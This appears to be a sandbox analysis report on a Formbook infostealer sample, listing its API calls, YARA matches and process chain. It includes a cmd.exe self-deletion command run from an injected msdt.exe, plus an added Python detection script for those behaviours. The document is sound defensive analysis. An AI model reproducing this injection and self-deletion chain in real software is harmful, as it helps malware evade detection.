            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A496E0 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49A20 NtResumeThread, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49A00 NtProtectVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49660 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49A50 NtCreateFile, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A495F0 NtQueryInformationFile
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A499D0 NtCreateProcessEx
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49520 NtWaitForSingleObject
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A4AD30 NtSetContextThread
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49560 NtWriteFile
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49950 NtQueueApcThread
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A498A0 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49820 NtEnumerateKey
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A4B040 NtSuspendThread
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A4A3B0 NtGetContextThread
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49730 NtQueryVirtualMemory
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49B00 NtSetValueKey
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A4A710 NtOpenProcessToken
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49760 NtOpenProcess
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49770 NtSetInformationFile
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A4A770 NtOpenThread
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49A80 NtOpenDirectoryObject
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A496D0 NtCreateKey
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49610 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49A10 NtQuerySection
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49670 NtQueryInformationProcess
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49650 NtQueryValueKey
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B95D0 NtClose, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9540 NtReadFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B96D0 NtCreateKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B96E0 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9650 NtQueryValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9660 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9780 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9FE0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9710 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9840 NtDelayExecution, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9860 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B99A0 NtCreateSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9910 NtAdjustPrivilegesToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9A50 NtCreateFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B95F0 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049BAD30 NtSetContextThread
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9520 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9560 NtWriteFile
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9610 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9670 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B97A0 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049BA710 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9730 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049BA770 NtOpenThread
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9770 NtSetInformationFile
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9760 NtOpenProcess
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B98A0 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B98F0 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9820 NtEnumerateKey
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049BB040 NtSuspendThread
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B99D0 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9950 NtQueueApcThread
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9A80 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9A10 NtQuerySection
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9A00 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9A20 NtResumeThread
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049BA3B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_049B9B00 NtSetValueKey
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_02528270 NtReadFile
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_025282F0 NtClose
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_025283A0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_025281C0 NtCreateFile
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_02528212 NtReadFile
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_025282EF NtClose
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: 5_2_0252839B NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\msdt.exe, Code function: String function: 0497B150 appears 124 times
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: String function: 01A0B150 appears 35 times
            Source: transferir copia_98087.exe, 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp: Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000000.00000002.225323893.0000000001438000.00000004.00000020.sdmp: Binary or memory string: OriginalFilenameclr.dllT vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000000.00000002.233022672.0000000008EC0000.00000002.00000001.sdmp: Binary or memory string: OriginalFilenamemscorrc.dllT vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000000.00000002.232951484.0000000008E90000.00000004.00000001.sdmp: Binary or memory string: OriginalFilenameAsyncState.dllF vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000000.00000002.223882180.0000000000D24000.00000002.00020000.sdmp: Binary or memory string: OriginalFilenameBuiltInPermissionSets.exe< vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000001.00000000.223139596.0000000000FA4000.00000002.00020000.sdmp: Binary or memory string: OriginalFilenameBuiltInPermissionSets.exe< vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000001.00000002.271869350.0000000001AFF000.00000040.00000001.sdmp: Binary or memory string: OriginalFilenamentdll.dllj% vs transferir copia_98087.exe
            Source: transferir copia_98087.exe, 00000001.00000002.272134673.0000000003720000.00000040.00000001.sdmp: Binary or memory string: OriginalFilenamemsdt.exej% vs transferir copia_98087.exe
            Source: transferir copia_98087.exe: Binary or memory string: OriginalFilenameBuiltInPermissionSets.exe< vs transferir copia_98087.exe
            Source: transferir copia_98087.exe: Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: transferir copia_98087.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@12/9
            Source: C:\Users\user\Desktop\transferir copia_98087.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\transferir copia_98087.exe.log
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_01
            Source: C:\Users\user\Desktop\transferir copia_98087.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\transferir copia_98087.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (logged twice)
            Source: C:\Windows\SysWOW64\msdt.exe | File read: C:\Windows\System32\drivers\etc\hosts (logged twice)
            Source: transferir copia_98087.exe, 00000000.00000002.226455880.0000000003111000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: transferir copia_98087.exe, 00000000.00000002.226455880.0000000003111000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: transferir copia_98087.exe | Virustotal: Detection: 22%
            Source: transferir copia_98087.exe | ReversingLabs: Detection: 12%
            Source: unknown | Process created: C:\Users\user\Desktop\transferir copia_98087.exe 'C:\Users\user\Desktop\transferir copia_98087.exe'
            Source: unknown | Process created: C:\Users\user\Desktop\transferir copia_98087.exe C:\Users\user\Desktop\transferir copia_98087.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\transferir copia_98087.exe'
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\transferir copia_98087.exe | Process created: C:\Users\user\Desktop\transferir copia_98087.exe C:\Users\user\Desktop\transferir copia_98087.exe
            Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\transferir copia_98087.exe'
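The process-creation and file-read lines above describe a chain worth turning into detection logic: the sample relaunches a copy of itself (the staging step for the process hollowing the report flags), a Windows system binary (msdt.exe, whose creator the report lists as unknown) later spawns cmd.exe to delete the original file, and explorer.exe and msdt.exe both read the hosts file, which neither has a routine reason to do. The Python below is an added example and not part of the Joe Sandbox report: it runs three rules over a constructed event list transcribed from those lines. The Event shape, the rule names and the "Windows system binary" path heuristic are assumptions for illustration; a real pipeline would map Sysmon or EDR process and file events onto the same shape.

```python
import re
from dataclasses import dataclass

# Paths taken from the report lines; the telemetry shape and rules are constructed for this example.
SAMPLE = r"C:\Users\user\Desktop\transferir copia_98087.exe"
MSDT = r"C:\Windows\SysWOW64\msdt.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"
EXPLORER = r"C:\Windows\explorer.exe"
HOSTS = r"C:\Windows\System32\drivers\etc\hosts"


@dataclass
class Event:
    kind: str          # "process_create" or "file_read"
    actor: str         # process performing the action; "unknown" where the report lists no creator
    target: str        # child image for process_create, file path for file_read
    cmdline: str = ""  # child command line (process_create only)


# Constructed event list, transcribed from the "Process created" / "File read" lines above.
EVENTS = [
    Event("process_create", SAMPLE, SAMPLE, SAMPLE),
    Event("process_create", "unknown", MSDT, MSDT),
    Event("process_create", MSDT, CMD, f"/c del '{SAMPLE}'"),
    Event("process_create", "unknown", CONHOST, f"{CONHOST} 0xffffffff -ForceV1"),
    Event("file_read", EXPLORER, HOSTS),
    Event("file_read", MSDT, HOSTS),
]

# cmd.exe "/c del <path>", with or without quotes around the path
DEL_RE = re.compile(r"/c\s+del\s+['\"]?(.+?)['\"]?\s*$", re.IGNORECASE)

# Heuristic (assumption, not from the report): what counts as a trusted Windows image.
WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\explorer.exe")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_windows_binary(path: str) -> bool:
    return path.lower().startswith(WINDOWS_DIRS)


def detect(events, sample_path: str):
    """Return (rule_name, detail) findings for the three behaviours the report exposes."""
    sample = sample_path.lower()
    findings = []
    for e in events:
        if e.kind == "process_create":
            # 1. A process launching a copy of itself is the usual staging step for
            #    process hollowing: the child is created suspended and then overwritten.
            if e.actor.lower() == e.target.lower():
                findings.append(("self_spawn", f"{basename(e.target)} launched a second copy of itself"))
            # 2. A Windows system binary deleting the original sample via cmd.exe only makes
            #    sense if the sample's code is now running inside that system process.
            if is_windows_binary(e.actor) and basename(e.target) == "cmd.exe":
                m = DEL_RE.search(e.cmdline)
                if m and m.group(1).lower() == sample:
                    findings.append(("system_process_deletes_sample",
                                     f"{basename(e.actor)} ran cmd.exe to delete {sample_path}"))
        elif e.kind == "file_read":
            # 3. explorer.exe and msdt.exe have no routine reason to open the hosts file;
            #    baseline this against your own fleet before alerting on it.
            if e.target.lower() == HOSTS.lower() and is_windows_binary(e.actor):
                findings.append(("hosts_read_by_system_process", f"{basename(e.actor)} read {HOSTS}"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(EVENTS, SAMPLE):
        print(f"[{rule}] {detail}")
```

The conhost.exe line is deliberately kept in the event list: it is noise from the cmd.exe launch and should not trigger any rule, which is a useful negative case when tuning the heuristics.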
            Source: C:\Users\user\Desktop\transferir copia_98087.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: transferir copia_98087.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR